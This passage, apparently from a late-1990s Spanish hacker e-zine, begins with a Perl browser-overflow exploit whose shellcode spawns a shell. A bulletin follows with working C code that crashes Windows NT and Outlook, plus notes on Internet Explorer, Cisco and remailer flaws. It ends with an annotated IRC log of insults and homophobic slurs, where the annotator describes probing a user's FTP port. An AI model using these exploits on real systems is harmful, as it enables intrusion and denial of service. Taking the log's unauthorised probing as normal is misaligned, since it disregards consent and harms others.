  31 c0 		# xorl %eax,%eax
  66 b8 ff 0f		# movw $0x1056,%ax
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  29 c4			# subl %eax,%esp

  31 c0 b0 30
  31 db b3 0e
  31 c9 b1 01
  cd 40
};

my $code = $pre . parse qw{
  b0 55			# movb $0x55,%al (marker)
  eb 58			# (jump below)

  5e			# popl %esi

  56			# pushl %esi
  5b			# popl %ebx
  43 43 43 43 43 43
  43 43 43 43 43	# addl $0xb,%ebx

  21 33			# andl %esi,(%ebx)
  09 33			# orl %esi,(%ebx)

  31 c0 		# xorl %eax,%eax
  66 b8 56 10		# movw $0x1056,%ax
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  33 c0			# xorl %eax,%eax
  b0 05 		# movb $5,%al
  01 c4			# addl %eax,%esp 
  c0 24 24 01		# shlb $1,(%esp)
  29 c4			# subl %eax,%esp
  66 b8 56 10		# movw $0x1056,%ax
  29 c4			# subl %eax,%esp


  31 d2			# xorl %edx,%edx
  21 56 07		# andl %edx,0x7(%esi)
  21 56 0f		# andl %edx,0xf(%esi)
  b8 1b 56 34 12	# movl $0x1234561b,%eax
  35 10 56 34 12	# xorl $0x12345610,%eax 

  21 d9			# andl %ebx,%ecx
  09 d9			# orl %ebx,%ecx

  4b 4b 4b 4b 4b 4b
  4b 4b 4b 4b 4b	# subl $0xb,%ebx

  cd 40			# int $0x80
  31 c0			# xorl %eax,%eax
  40			# incl %eax
  cd 40			# int $0x80


  e8 a3 ff ff ff	# (call above)
};

$code .= "/bin/sh";

my $transmission = parse qw{
  6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz
  20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz
  79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz
  20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz
  79
};

my $nop = "\x90"; # this actually gets mapped onto 0x3f, but it doesn't seem
                  # to matter

my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be somewhere
                                  # in the chunk of nops.  works on every
                                  # linux box i've tried it on so far.
             

my $len = 0x1000 - length($pre);
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;
# the first $address is in the string replaces another
# pointer in the same function which gets dereferenced
# after the buffer is overflowed.  there must be a valid
# address there or it will segfault early.

print <<EOF;
Content-type: text/html

<!-- $transmission -->
<embed type="$exploit" src="data:x">
EOF
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Windows NT
Objetivo:     Crash Nt
Parche:       Aun se lo estan pensando
Creditos:     fill <fill@TCHERCOM.RU>
Descripcion:  Este programa resetea un Nt con SP4 RC
Codigo:       
#include <windows.h>

int WINAPI WinMain(HINSTANCE hinstExe,
           HINSTANCE hinstPrev, LPSTR lpszCmdLine,
int nCmdShow)
{
  HMENU hMenu = CreatePopupMenu();
  HMENU hMenu1 = CreatePopupMenu();
  AppendMenu(hMenu1,MF_STRING, 1, "1");
  AppendMenu(hMenu1,MF_STRING, 2, "2");
  AppendMenu(hMenu1,MF_STRING, 3, "3");
  InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");
  InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");
  InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");
  InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");
  InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");
  InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");
  return 0;
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Internet Explorer 4 
Objetivo:     Fallo de seguridad, obtener ficheros de un navegador.
Parche:       http://www.microsoft.com/security/bulletins/ms98-015.asp
              Para los que no tengan el parche:

             a) Activar  el  aviso  para   cuando se transmiten formularios no
             cifrados, ya  que  indicaria al usuario que se pretende enviar un
             fichero.

             b) Desactivar la ejecucion de  guiones  para la zona de seguridad
             de Internet.

             Ambas  opciones  se  pueden configurar en Edicion --> Opciones de
             Internet --> Seguridad -->  Configuracion... La primera de ellas,
             en  "Miscelanea",  desactivando   la  opcion "Enviar los datos no
             encriptados  del  formulario". La  segunda,  en "Automatizacion",
             desactivando la opcion "Automatizacion activa".
Creditos:    Juan Carlos Garcia Cuartango <cuartangojc@mx3.redestb.es>
Descripcion: Pues  eso  que   este  fallo  se aprovecha de la manera en que IE
             gestiona las  operaciones de  cortar y pegar a traves de guiones.
             El agujero permite a un atacante  pegar  el  nombre de un fichero
             en el control de carga de ficheros (control que teoricamente solo
             el usuario esta autorizado a rellenar manualmente) para posterior
             mente enviarselo de vuelta al atacante.
Codigo:      -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Microsoft Outlook
Objetivo:     Denial Of Service
Parche:       EL mismo que el de Cuartango
Creditos:     rockme@altern.org
Descripcion:  Cuando  Microsoft  Outlook  lee el subject de un e-mail lo aloja
              con  un tamao de aproximadamente 5000 caracteres y no comprueba
              el tamao del subject recibido.
              Este programa  hace que windows se estrelle. Es posible ejecutar
              comandos, solo debes modificar el codigo.
Codigo:
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

struct in_addr
resolv(char *name)
{
  static struct in_addr in;
  unsigned long l;
  struct hostent *ent;

  if((l = inet_addr (name)) != INADDR_NONE)
    {
      in.s_addr = l;
      return in;
    }
  if(!(ent = gethostbyname (name)))
    {
      in.s_addr = INADDR_NONE;
      return in;
    }
  return *(struct in_addr *) ent->h_addr;
}


   char buf[70000];
   char server[5000];
   char mailfrom[5000];
   char rcptto[5000];


main (int argc, char *argv[])
{
  struct sockaddr_in addr;
  int i, s;
  char c;
  int port=25;
  
 
 if(argc < 3){
 printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]);
 printf(" Warning this program do not spoof your IP adress !\n\n");
 exit(0);
 } 

 if(strlen(argv[1]) > 4990){
 printf("Sorry mailserver is too big .\n");
 exit(0);
 }

 if(strlen(argv[2]) > 4990){
 printf("Sorry sender is too big .\n");
 exit(0);
 }

 if(strlen(argv[3]) > 4990){
 printf("Sorry recipient is too big .\n");
 exit(0);
 }
 
 /*  Mwarf, my program is protected from buffer overflow attacks :) */
 
 printf("\nRockme Security Research Laboratory !\n\n\n");
 printf("Microsoft Outlook Denial of Service !\n");
 printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n");

 sprintf(server, "HELO %s\n", argv[1]); 
 sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]);
 sprintf(rcptto, "RCPT TO: %s\n", argv[3]);

  s = socket(AF_INET, SOCK_STREAM, 0);
  addr.sin_family = AF_INET;
  addr.sin_addr = resolv(argv[1]);
  addr.sin_port = htons(port);
  connect(s, (struct sockaddr *) &addr, sizeof (addr)); 

write(s, server, strlen(server));
sleep(1);

write(s, mailfrom, strlen(mailfrom));
sleep(1);

write(s, rcptto, strlen(rcptto)); 
sleep(1);

write(s, "data\n", 5);
sleep(1);

write(s, "Subject : ", 10);
sleep(1);

for(i = 1; i < 7000; i++){
write(s, "X", 1);
}
sleep(3);

write(s, "\n", 1);
sleep(1);

write(s, "bonjour\n", 8); 
sleep(1);

write(s, ".\n", 2);
sleep(1);

write(s, "quit\n", 5);
sleep(1);

read(s, buf, 69000); /* read (s, &c, 1); */
printf("%s", buf);  

printf("\n");

}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-


S.O/Programa: Cisco routers
Objetivo:     Buffer overflow
Parche:       Pendiente de salir
Creditos:     -
Descripcion:  Al  crearse un desbordamiento de buffer, los fragmentos de texto
              escritos  antes por los usuarios se pueden conocer, ironicamente
              los sitios  con  una  buena  politica de contraseas son los mas
              vulnerables, ya  que  si  obligan a cambiar cada poco las claves
              de sus usuarios, es mas probable que en estos fragmentos podrian
              encontrarse contraseas.  No  se  necesita tener una cuenta solo
              conectarse  al  dispositivo  adecuado  y  escribir  la  sucesion
              apropiada de caracteres.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Remailer de iname.com
Objetivo:     Saber la direccion del redireccionamiento
Parche:       Respuesta de iname.com:
              We are  currently  aware  of the problem you experienced and are
              currently working to resolve it. The "user-unknown" bounces your
              senders have experienced appear to  be  sporadic. Our Technology
              team  is  currently  working to address this issue. We sincerely
              apologize for the inconvenience caused by this problem.
Creditos:     Senpai <senpai@cyberdude.com>
Descripcion:  El fallo descubierto por Senpai, miembro de RareGazZ permite
              averiguar la direccion a donde se realiza el forward, puede
              llegar a descubrirse la direccion original (a donde redirecciona
              si se le envia un mail a su remailer e iname no puede acceder a
              acceder a la direccion que aparece en el forward de iname
              devuelve el mail al que lo envio, pero con un pequeo fallo,
              indica cual es la direccion a la que no pudo acceder.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Historias del IRC (segunda parte) - GuyBrush ]


Algunos os preguntareis ... porque es la segunda parte? donde esta la primera?
La pimera parte de esta cruda realidad la teneis en el numero 16 de SET ...

Un buen dia andaba yo por el IRC chateando con algunos amigos en canales no de
hack cuando pense en darme una vuelta por #hackers a ver que se cocia por alli.
Asi que le  pedi a mi amigo ufo la contrasea y entre a dotorear un poco. Cual
fue mi  sorpresa cuando, a pesar de que usaba otro nick, se enteraron de quien
era ... logicamente,  se lo  dijo  ufo porque  con  lo paleto  que  es nuestro
protagonista de hoy ...

Pues aqui  teneis casi todo el log. Podeis sacar vuestras propias conclusiones
...  (por cierto, mi nick era q1234)

Session Start: Mon Nov 23 00:22:13 1998
*** Now talking in #hackers
*** Topic is '[~AZZ~] -> Ahora seras auto opeado cuando entres por mi rekto.'
*** Set by Nardo on Mon Nov 23 00:13:06
*** ufo sets mode: +oo q1234 LoLo
<Cuasl> q1234 tu eres GuyBrush?
<q1234> thx por decirlo en el canal
<Cuasl> q1234 por?
<Cuasl> q1234 no kieres ke se enteren de lo lamer ke eres?
<l0b0> :????????
<q1234> quieres pelea ?  pues buscate a otro ...
<Cuasl> q1234 pelea? yohe dishopelea?
<jla> ?
<jIa> q1234: porke no te largas enpanao?

        [ Comentario: Que conversacion tan interesante !!! cuanta cultura !!!
                      que cosas que se aprenden en el IRC !!! ]

<MuErTe> ?
<jla> joe cuasi
<ufo> JLA
<ufo> jla
<jla> tu?
<ufo> shhh
- entra ufete (2ufo@rs161.readysoft.es4)
- Clones (ufo, ufete )6 rs161.readysoft.es 4[124]
*** MuErTe sets mode: +o ufete
- sale ufete 2(4ufo@rs161.readysoft.es2)
<jla> almenos dejadme dicirlo ami
<ufo> el que?
<jla> lo que he dicho antes
<ufo> que has dixo antes?
<LoLo> wenn
<jla> io que se esto habla solo i to :)
<jIa> aparte de ke he disho ke se largue el empanao del GuyBrush
<jIa> nada mas
*** ufo is now known as ud
*** ud has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-)
<jla> sera el megahal que ia habra aprndido a rajar el solo
<q1234> largate tu gilipollas
- entra - ufo -(ufo@rs161.readysoft.es)
<q1234> que coo te he hecho yo?
<jla> q1234 con el tiempo te daras cuenta de que todo es relativo mas aqui
<q1234> de que me hablas?
<jIa> akaso el ke seas feo no es una buena razon pa ke te largues?
<q1234> dime antes que te hecho?
<ufo> llevas aqui un par de dias y ya tas hechando gente?
<ufo> esperate un pokito no?
<jIa> no hecho a nadie , solo insulto a los lamers komo el Guy.
<ufo> lamers?
<ufo> el Guy lleva aqui mas de un ao...

        [ pero ufo ... como le hablas de numeros al chaval? si no sabe
          contar!!! ]

<jla> joe me dijeron que el linux erea mu inteligente peor no pense que tanto
<jla> jia
<jIa> q1234, peaso nick chorras ke tas puesto no? digno de anormales :P

        [ anda que el tuyo ... (que es MuErTe, como vereis despues) ]

<jla> jIa
<jla> joder entodavia me haceis cambiar de nick
<Cuasl> veiz
<q1234> muerte ... da la cara

        [ Dios mio !!!! cuanto sabe el tal MuErTe apestosa ese !!! si es capaz
          de meter dos clones y ponerles nombres parecidos a los del resto de
          usuarios !!! que gran jacker !!! de mayor quiero ser como el ... y
          lo que mas me impresiona es su nick ... impresionante ]

<Cuasl> jeje
<Cuasl> en linux se nota mas
<MuErTe> xDD
<Cuasl> pero en win no se nota na
<MuErTe> anda kas tardao melon
<MuErTe> xD
<Hackelin> valla oztia
<Cuasl> ke va muerte
<Cuasl> ezke no me daba kuenta
<MuErTe> tu no sunn
<MuErTe> xD
<Cuasl> de verdad ke ni me enterao
<MuErTe> el Guy
<Cuasl> ahh
*** ufo sets mode: +n
<MuErTe> xD
<Cuasl> ya
<Cuasl> XDD
<Cuasl> fale
*** Cuasl is now known as sunn
<sunn> ya
<sunn> :)
<sunn> XDDDDDDDD
*** ufo has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-)
<sunn> jeje
<MuErTe> .
<sunn> . ?
<sunn> :P
<sunn> paso un angel................................................
<sunn> X)
<sunn> paso un ciclo..............................................

        [ no!!! era un burro volando!!! ]

<sunn> mejor dicho
<sunn> XDDDD
<sunn> XD
<sunn> jeje
*** Atic sets mode: +o Hackelin
*** MuErTe changes topic to '[5m[49mhttp://www.ufoplanet.org/rc5  << See Now!![0m'
<Atic> ui si esta HAckelin de la Vega !
<Atic> :*
<Atic> xD
<jla> joder 
<sunn> MuErTe: el topic ese me va a volver lokorrrrr !!!!!
<sunn> xD
<MuErTe> xD
<sunn> jeje
<MuErTe>  /clear
<MuErTe> xD
<sunn> raya ke no veas
<sunn> ya
<sunn> :P
<sunn> jeje
<MuErTe> si kieres lo pongo verde fosforito
<MuErTe> xD
<sunn> sip
<sunn> mola maz
<sunn> jeje
<sunn> XD
<MuErTe> xD
<MuErTe> pso a la prosima
<MuErTe> xD
<sunn> oka
<sunn> :)
<MuErTe> kara tendria ke modifiskar el script
<MuErTe> y me da un palo del kopon
<MuErTe> xD
<sunn> aha
<jla> script
<MuErTe> mejor mato el tiempo leyendo los fabulosos Tectos de Seguridad
         informatica de PcActual
<sunn> av si me lo rlz
<sunn> jeje
<jla> ummm
<sunn> los de Linux Actual rlz more
<sunn> :)
<MuErTe> nonononon
<MuErTe> PC Actual
<MuErTe> xD
<MuErTe> mola mas
<MuErTe> xD
<sunn> guenonp
<sunn> x)
*** MuErTe sets mode: +o jla
<MuErTe> xD
<AciD-KrS> xDDD
<MuErTe> sobretodo los testosto der guy
<MuErTe> xD
<MuErTe> sobretodo los testos der guy
<MuErTe> xD
<sunn> jeje
<jla> agg dejemoslo
<MuErTe> me tronsho kuando los leo
<MuErTe> xD

        [ los lees ????? un 31337 como tu ??? no jodas!!!! que honor!!!! ...
          pense que solo leias el tele-indiscreta ... ]

<sunn> en la de este mez ?
<MuErTe> no sep
<MuErTe> este mes no lu tengo

        [ no 'lu' tienes? ]

<sunn> oka
<MuErTe> xD
- entra LoLo (2~LoLo@195.77.49.604)
*** \W3nd|g0 sets mode: +o LoLo
<LoLo> res
<LoLo> th
<LoLo> thx
<MuErTe> xD
<MuErTe> se lolo kampeon
<MuErTe> xD
<LoLo> -\W3nd|g0(IRcap.3@195.235.64.57)-  Hola  LoLo  Bienvenido al canal.
<LoLo> te creia mas formal
<LoLo> xD
<LoLo> [Nov 22 23:05:55 GMT] 5 RC5 blocks are in file buff-out.rc5
<MuErTe> muahua+
<MuErTe> xD
<LoLo> campion , campion
<LoLo> : P
<MuErTe> xDD
<MuErTe> HIP. HIP HURRA!!!!! par 75 der LoLO!!
<MuErTe> ke ya pronto llega a los 1000!!
*** AciD-KrS has quit IRC (samba Rlz!!!!!!!!)
<LoLo> 75?
<LoLo> komor?
<MuErTe> HIP. HIP HURRA!!!!! par P - 75 der LoLO!!
<LoLo> aaaaaaaapz
<LoLo> XDDDDDD
<MuErTe> xDD
<LoLo> na, si hoi he mandao 68 blokes
<LoLo> : P
<LoLo> i tu puta, a ver si kompartes SGI XD
<MuErTe> juer
<MuErTe> xD
<MuErTe> muahua
<MuErTe> xd
<MuErTe> si no tengu
<MuErTe> 3 pedaso de shell ke tenia

        [ que tipico ... ]

<MuErTe> ya se man jorobau

        [ repito ... QUE TIPICO ... ]

<MuErTe> xD
<MuErTe> normal
<MuErTe> use los maravillosos testor der Guy , pa arreglarles la mashine
<MuErTe> y han akabau metiendo win3.11

        [ se ve que en el parbulario no le ensean bien .... neeeeeene  que no
          se dice mashine, que es maquina y acabado ... no akabau .. si es que
          nunca aprendera ... ]

<\W3nd|g0> ?
<\W3nd|g0> k hoy to dios se mete kon el Guy u k?
<\W3nd|g0> XDDDDDDDDDDDD

        [ el 'guy' esta echando un vistazo por la maquina del Mofeta, digo,
          muerte ... anda!!! cuanto puerto abierto!!!! si no me caben por
          pantalla!!! jejejeje ... la gente piensa que usar linux es meterle
          el Bitchx y conectarse al IRC ... si es que nunca aprendera ...
          A ver a ver .... puerto 113, 21, 23 ... interesante ... echemos un
          vistazo a ese puerto 21 que lo veo un poco mal ... ]

<MuErTe> xDDD
<MuErTe> otro ke no sa koskao
<MuErTe> xD
<MuErTe> wendi
<MuErTe> xD
<MuErTe> kes el jIa y el Cuasl era yor
<MuErTe> xD

        [ XDDDD que divertido!!!! como mola hacer el gilipollas!!! ale a
          regalar dinero a telefonica (o como diria el ... tim0f0nic@)
          haciendo el imbecil ]

<jla> jla jIa joe con las x no se notaba...
<MuErTe> yap
<MuErTe> kon los Gin tmpk se nota

        [ habra que plantearse el escribir algun articulo sobre como cambiar
          las 'l' por 'i' o por '1' para insultar a la gente sin dar la cara
          ... es lo mas!!! dominando eso y con una @ ... 31337 seguro!! ]

<jla> que kpullo XDD
<sunn> MuErTe: el bitchx tiene algun hole cuando ta rlz en x ?
<MuErTe> kapuIIo?
<MuErTe> ein?
<MuErTe> traduseme illor , ke yo no tengo er nivel del Guy

        [ desde luego que no ... mas quisieras ... pues mira, lo que quiere
          decirte es que conectarte al IRC con el Bitchx desde las X de linux
          no es seguro (me sigues?) ... y menos si te conectas como
          superusuario (Mmmmm seguro que te has perdido ...) ]

<MuErTe> y no se kosas desas

        [ lo se ... todo lo que no sea IRC, Clon, Ban o Kick ... ni idea,
          verdad? ]

<jla> eh mande!
- entra inf (2nACK-Ack@ppp145.198.redestb.es4)
<LoLo> nas inf
<inf> joer
*** LoLo sets mode: +o inf
<inf> lap
<q1234> desde luego ... tu, todo lo que no sea IRC ... ni puta idea
<inf> a ver...
<sunn> el cliente de irc denominado BitchX tiene algun fallo en su integridad mientras este esta arrankado (ejecutandose) desde el entorno grafico denominado Xwindows ??????????????
<MuErTe> pff
<MuErTe> xD
<sunn> XDDD
<sunn> ya ??
<inf> ande poneis la key q argun dia me voy a vorve loko
<sunn> XDDDDD
<inf> :?
<inf> MUERRRRRRRRRTTTTTT
<inf> XDDD
<MuErTe> inffffff :))
<MuErTe> dios
<MuErTe> kuanto tiemporl
<sunn> jejejejeje
<MuErTe> xDD
<inf> mecagentoo

        [ se me saltan las lagrimas ... ]

<sunn> MuErTe: ya ?
<MuErTe> pos sunn
<MuErTe> ke yo sepa, aparte de ke en una Xterm lo veras del kulo, ninguno
<inf> [ MuErTe: ] como tamos ?
<MuErTe> metete una ansi-xterm

        [ donde habra aprendido ese vocabulario? guau!!! lo que yo te diga ..
          31337 al 100 por 100 !!! ]

<MuErTe> y se arreglara un plin
<MuErTe> inf : bien :)
<MuErTe> y tu ke?
<sunn> faler torpedor
<sunn> :P
<jla> reboot
<MuErTe> bye jIa
<MuErTe> xD
<jla> joe
<jla> /quit
*** jla has quit IRC (BitchX-74p4+Deb1an -- just do it.)
<sunn> ke alguien me hhaga un whois y lo pege
<sunn> plisssss
<MuErTe> yo eske vakas no me interesaban
<MuErTe> xD
<MuErTe> los pobres semos asin

        [ chaval tu no eres pobre ... eres analfabeto ... ]

<MuErTe> xD
<LoLo> | channels : @#opers@#pepe #seguridad_informatica @#hackers
<sunn> jejeje
<sunn> joje
<sunn> joe
<MuErTe>    
<MuErTe>  sunn (~sunn@ig-254.arrakis.es) [spain]
<MuErTe>  (ircname)  -=B0rN 70 B3 4W4y=-
<MuErTe>  (channels) @#opers@#pepe #seguridad_informatica @#hackers
<MuErTe>  (server)   pleyades.irc-hispano.org - Arrakis IRC Server
<MuErTe>    
<sunn> el fake join no rlz good pal linux
<sunn> jeje
<sunn> pero pa win yep
<sunn> guenop
<sunn> na
<sunn> thx ppl
<sunn> :)
<inf> una preg...
<inf> q coo hase #hackers con -s ?

        [ joder !!!! que fallo!!!! como si no se conociera el canal ... para
          ponerlo secreto!!! ]

<MuErTe> er fake version mola 
<MuErTe> xD
<MuErTe> tenes rason inf
<MuErTe> xD
<inf> otia
<inf> #seguridad_informatica
*** MuErTe sets mode: +s
<MuErTe> sip
<MuErTe> er mashine kanal der guy
<MuErTe> xD
<sunn> jeje
<MuErTe> alli saprende munsho

        [ desde luego, mas que en este canal si que se aprende, aunque claro,
          tu de seguridad, ni puta idea ... tu solo hack ... e IRC!!! que no
          se me olvide ... ]

<MuErTe> xD
<sunn> x)
<MuErTe> vaya..
<MuErTe> komo aki
*** Atic has quit IRC (Ping timeout for Atic[ctv21225131172.ctv.es])
<MuErTe> xD
<sunn> gueno ppl
<sunn> iop xapo
<MuErTe> eske inf
<MuErTe> ayer y antes de ayer
<MuErTe> no se el porke
<sunn> noz vemoz
<MuErTe> estaba -k tambien
<MuErTe> byez sunn
*** sunn has quit IRC (By3x 4ll)
<inf> jurl
<MuErTe> no se kien pollas lo toka

        [ no sabes quien pollas lo toca, o quien te toca la polla?  ??? ]

<MuErTe> alomejor era un makrokonsejo der guy
<MuErTe> vete a saber
- entra - Atic (2HG@ctv21225131009.ctv.es4)
*** MuErTe sets mode: +o Atic
- entra - cheme (2~chmegochy@ctv2234.ctv.es4)
- Clones -( cheme , EMF ctv2234.ctv.es ]
<MuErTe> 7op copito
*** MuErTe sets mode: +o cheme
<MuErTe> xD
<cheme> thz :)
<inf> weno..., arguien sabe como le va al  'iruxete?
<MuErTe> xDDD
<MuErTe> pos yo me voin a ir yap

        [ que vas a aprender a escribir mejor? ... lo necesitas ... y de paso,
          cambiate de nick ... por cierto, tal y como pense, ese puerto 21
          tiene algunos fallos de configuracion ... pero como tu no vas por
          #seguridad_informatica porque eso no es c00l ... sigue asi chaval ]

<ufo> si tio
<ufo> porlo que veo
<ufo> ya no sigues el horario
<ufo> XDDDDDDDD
<MuErTe> xDD
<MuErTe> si lo sigoo
<MuErTe> xD
<MuErTe> weno
<MuErTe> en parte
<MuErTe> pasa ke maniana no kurro por la maana

        [ no abre el club? si es lunes ... ]

<MuErTe> tengo ke ir ar medikor

        [ ahhh, claro!!! otra vez te dio el ataque ... te tengo dicho que
          tanto hackear no es bueno ... si es que ser 31337 es muy duro ... ]

<ufo> XD
<ufo> ya tan detectau la enfermedad?
<ufo> XD
<ufo> ya era hora
<inf> [ MuErTe: ] diras al lokero
<MuErTe> aunek tengu ke levantarme a las 7
<ufo> ya se notaba mazo
<inf> [ MuErTe: ] q te pasa?
<MuErTe> toin malito :(

        [ lo tuyo no tiene remedio ... eres gilipollas   :)  ]

<MuErTe> xD
<ufo> pos tendra pikores en la polla.....como siempre
<MuErTe> maana me lo diran
*** Atic sets mode: +o NunotReeZ
- ThE_RaY (2bbb@ctv21225131038.ctv.es4)
*** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones)
<ThE_RaY> hy!
<MuErTe> me tienes ke haser 3 ekografias

        [ y ahora viene lo mas divertido ... ]

*** ufo sets mode: -b *!*@ctv2234.ctv.es
*** Atic sets mode: -b *!*@ctv2234.ctv.es
- entra  NunotReeZ (2~cyber10@ctv2234.ctv.es4)
- Clones (cheme , EMF , NunotReeZ ) ctv2234.ctv.es 4[134]
*** \W3nd|g0 sets mode: +b *!*@ctv2234.ctv.es
*** Atic sets mode: +oo cheme EMF
<MuErTe> lso riones y la bufeta
*** cheme was kicked by LoLo (Banned)
*** EMF was kicked by LoLo (Banned)
*** ufo sets mode: -b *!*@ctv2234.ctv.es
*** Atic sets mode: +o NunotReeZ
*** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones)
- entra  NunotReeZ (2~cyber10@ctv2234.ctv.es4)
<inf> [ MuErTe: ] tas preao ?
*** ufo sets mode: -ooo inf Hackelin Atic
*** ufo sets mode: -oooo q1234 MuErTe LoLo l0b0
*** ufo sets mode: -o \W3nd|g0
- entra EMF (2~emf@ctv2234.ctv.es4)
- Clones (2 EMF ,2 NunotReeZ ) ctv2234.ctv.es 4[124]
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<NunotReeZ> kagondios
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<Atic> xD
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<inf> [ MuErTe: ] tas preao ?
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<NunotReeZ> panda lamers
*** ufo sets mode: +oooo inf Hackelin EMF Atic
- sale Atic (4HG@ctv21225131009.ctv.es2)
*** ufo sets mode: +oooo NunotReeZ MuErTe LoLo l0b0
*** ufo sets mode: +oo ThE_RaY q1234
<EMF> X'''''''DDDDDDDDDDDDDDd
<NunotReeZ> X)
- entra Atic (2HG@ctv21225131009.ctv.es4)
*** ufo sets mode: +o Atic
*** EMF sets mode: +v \W3nd|g0
<MuErTe> ?
<EMF> :P
<NunotReeZ> Unable to connect to finger address
<NunotReeZ> kagondios
*** Atic sets mode: -oooo EMF Hackelin inf l0b0
*** Atic was kicked by ufo (Mass Deop Protection! (4 Deops in 0 second(s) of 10. (7th Sphere)

        [ Guaaaaaauu ]

<NunotReeZ> X)
<ufo> pxxxxxx
<ufo> xapusero.....
<NunotReeZ> muerte
<\W3nd|g0> ese ufillo
<\W3nd|g0> ya la esta liandu
<\W3nd|g0> XDDDDDDDDDDDDDDD
<EMF> ei, muerte
- entra Atic (2HG@ctv21225131009.ctv.es4)
<NunotReeZ> pheorl
<NunotReeZ> X)
<EMF> kel the_ray 
<Atic> xD
<MuErTe> juer
<EMF> se mete al team
<MuErTe> ke rallada
<MuErTe> xD
*** CuasI sets mode: +o Atic
<MuErTe> diosssssss
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> noooo
<MuErTe> el gay del asidorrrr
<ufo> yasta .puedes pasar
<MuErTe> aki!!
<ufo> NOOOOOOOOOOOOOO
<MuErTe> noooooooooooooooo
<ufo> NOOOOOOOOOOOOOO
<AciD-KrS> muhahahaha
<MuErTe> xD
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<AciD-KrS> Puto!!
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UN GAYYYYYYYYYYYYYYYYYYY
<ufo> UUAAUAAUAUAUAUAUAAUAUAUAUAAUA
<inf> XDDDDDDDDD
<ufo> EL  MARINERITO LEREEEEEEEEE
<ufo> EL  MARINERITO LEREEEEEEEEE
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<AciD-KrS> bUFOn!!!!
<ufo> MUHAAHAHAHAHAHAHHAHAHAHAHAHHAHAHAHH
<inf> marike?
<AciD-KrS> Kpull00!
- entra \W3nd|g0 (2IRcap.3@195.235.64.574)
<AciD-KrS> xD
*** cheme sets mode: +o \W3nd|g0
<MuErTe> .
<MuErTe> weno jentusa
<MuErTe> ara si ke me voin
<MuErTe> weno no
<MuErTe> tengo ke hablar kon alguien
<MuErTe> xD
<\W3nd|g0> ?
<MuErTe> lo siento Wendi..
<MuErTe> kontigo no :)
<\W3nd|g0> mia k me habia esho la idea de k te ivas
<\W3nd|g0> ia me has amargao la noshe
<MuErTe> mauhauahauahuahaua
<MuErTe> xD
<\W3nd|g0> :o/
<\W3nd|g0> XDDDDDDDDDD
<\W3nd|g0> esta te la guardo
<\W3nd|g0> MUhahahAHAhAhahahaha
<MuErTe> byezz all
<MuErTe> menos al guy
<MuErTe> xD
<MuErTe> kes mu pheo
<MuErTe> xD
*** Atic has quit IRC (Ping timeout for Atic[ctv21225131009.ctv.es])
<MuErTe> @q1234     ] [IRcap.41@X.X.X.X
<MuErTe> mm
<MuErTe> akaso me intentabas hackear lamerazo?

        [ jejeje ... tu sigue insultado y diciendo tonterias que yo mientras
          hago 'algunas cosillas' por ahi ... Mmmm ese puerto 21 ... ]

<\W3nd|g0> uish
